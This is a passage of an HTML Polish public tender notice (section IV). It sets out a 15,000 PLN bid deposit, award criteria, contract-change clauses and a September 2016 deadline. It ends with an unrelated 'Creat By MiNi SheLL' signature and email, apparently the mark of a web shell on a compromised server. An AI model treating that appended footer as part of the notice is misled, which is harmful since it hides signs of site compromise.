            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Składający ofertę winien wnieść wadium przed upływem terminu składania ofert w   wysokości 15000,00 złotych
   (słownie : piętnaście tysięcy złotych)
1.Wadium może być wniesione w jednej z następujących form , określonych w art. 45 ust. 6 pkt 1-5
              1) pieniądzu
              2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo  
                  kredytowej, z tym , że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
              3) gwarancjach bankowych;
              4) gwarancjach ubezpieczeniowych;
              5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2  ustawy z dnia 9 listopada 
             2000 r. o  utworzeniu Polskiej Agencji Rozwoju   Przedsiębiorczości (Dz.U. 2014 poz. 180 ze zm.).

2. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego
    w  Banku Spółdzielczym w Żorach Nr  03 8456 0009 2001 0023 9732 0002, a dowód wniesienia dołączyć do oferty.
   Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
    Za termin wniesienia wadium przyjmuje się datę uznania rachunku Zamawiającego.

3.W przypadku wniesienia wadium w formie gwarancji lub poręczenia dokument zabezpieczenia należy złożyć przed 
    upływem terminu składania ofert w siedzibie  Zamawiającego.

4.Wadium wniesione w formie gwarancji ubezpieczeniowej lub bankowej będzie  akceptowane pod warunkiem, że jest    
    zgodne z Prawem Zamówień Publicznych, a w szczególności:

a) gwarancja będzie zawierała wszystkie przypadki utraty wadium przez wykonawcę   określone w art. 46 ust. 4a i ust. 5 
    Prawa Zamówień Publicznych,

b) okres ważności gwarancji będzie nie krótszy niż okres związania z ofertą określony w  specyfikacji istotnych 
    warunków zamówienia.

5.  Wadium wniesione w formie poręczenia bankowego, poręczeniach spółdzielczej kasy oszczędnościowo  
     kredytowej, poręczeniach udzielanych przez podmioty, o których  mowa w art. 6b  ust. 5 pkt 2 ustawy z dnia 
     9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju  Przedsiębiorczości będzie akceptowane pod warunkiem, 
     że jest zgodne z Prawem Zamówień Publicznych, a w szczególności :

a)  poręczenie będzie zawierało  wszystkie przypadki utraty wadium przez wykonawcę  określone w art. 46 ust. 4a 
     i ust. 5 Prawa Zamówień Publicznych,

b)  poręczenie będzie zawierało określony datą termin odpowiedzialności, nie krótszy niż okres związania ofertą 
     określony w Specyfikacji Istotnych Warunków Zamówienia.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancji</td><td>20</td></tr><tr><td>Doświadczenie personelu kluczowego(kierownik Budowy)</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Strony mają prawo do przedłużenia terminu zakończenia robót o okres trwania przyczyn, z  powodu których będzie 
      zagrożone dotrzymanie terminu zakończenia robót, w następujących  sytuacjach:
a)  jeżeli przyczyny, z powodu których będzie zagrożone dotrzymanie terminu zakończenia robót będą następstwem 
      okoliczności, za które odpowiedzialność ponosi Zamawiający, w szczególności będą następstwem nieterminowego 
      przekazania terenu budowy, konieczności zmian Dokumentacji projektowej w zakresie, w jakim ww. okoliczności 
      miały lub  będą mogły mieć wpływ na dotrzymanie terminu zakończenia robót,

b)  gdy wystąpią niekorzystne warunki atmosferyczne uniemożliwiające prawidłowe wykonanie robót, w szczególności 
      z powodu technologii realizacji prac określonej: Umową, normami lub innymi przepisami, wymagającej 
     konkretnych warunków atmosferycznych, jeżeli konieczność wykonania prac w tym okresie nie jest następstwem 
     okoliczności, za które Wykonawca   ponosi odpowiedzialność,

c)  gdy wystąpi konieczność wykonania robót zamiennych lub innych robót niezbędnych do wykonania przedmiotu 
    Umowy ze  względu na zasady wiedzy technicznej, oraz udzielenia zamówień dodatkowych, które wstrzymują lub 
    opóźniają  realizację przedmiotu Umowy, wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegle 
     prowadzonymi przez inne  podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji,

d)  jeżeli wystąpi brak możliwości wykonywania robót z powodu  nie dopuszczania do ich wykonywania przez 
      uprawniony organ lub nakazania ich wstrzymania przez uprawniony organ, z przyczyn niezależnych
      od Wykonawcy,

e)  wystąpienia Siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami.

2. Wykonawca  jest uprawniony do żądania zmiany Umowy w zakresie materiałów, parametrów  technicznych, 
     technologii wykonania robót budowlanych, sposobu i zakresu wykonania przedmiotu  Umowy w następujących 
     sytuacjach: 
a)	konieczności zrealizowania jakiejkolwiek części robót, objętej przedmiotem Umowy, przy zastosowaniu odmiennych rozwiązań technicznych lub technologicznych, niż wskazane w Dokumentacji projektowej, a wynikających ze stwierdzonych Wad tej Dokumentacji lub zmiany stanu prawnego w oparciu, o który je przygotowano, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub nienależytym wykonaniem przedmiotu Umowy,
b)	wystąpienia warunków geologicznych, geotechnicznych lub hydrologicznych odbiegających w sposób istotny od przyjętych w Dokumentacji projektowej, rozpoznania terenu w zakresie znalezisk archeologicznych, występowania niewybuchów lub niewypałów, które mogą skutkować w świetle dotychczasowych założeń niewykonaniem lub nienależytym wykonaniem przedmiotu Umowy,
c)	wystąpienia warunków Terenu budowy odbiegających w sposób istotny od przyjętych w Dokumentacji projektowej, w szczególności napotkania niezinwentaryzowanych lub błędnie zinwentaryzowanych sieci, instalacji lub innych obiektów budowlanych,
d)	konieczności zrealizowania przedmiotu Umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa,
e)	wystąpienia Siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 20/09/2016, godzina: 08:45,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com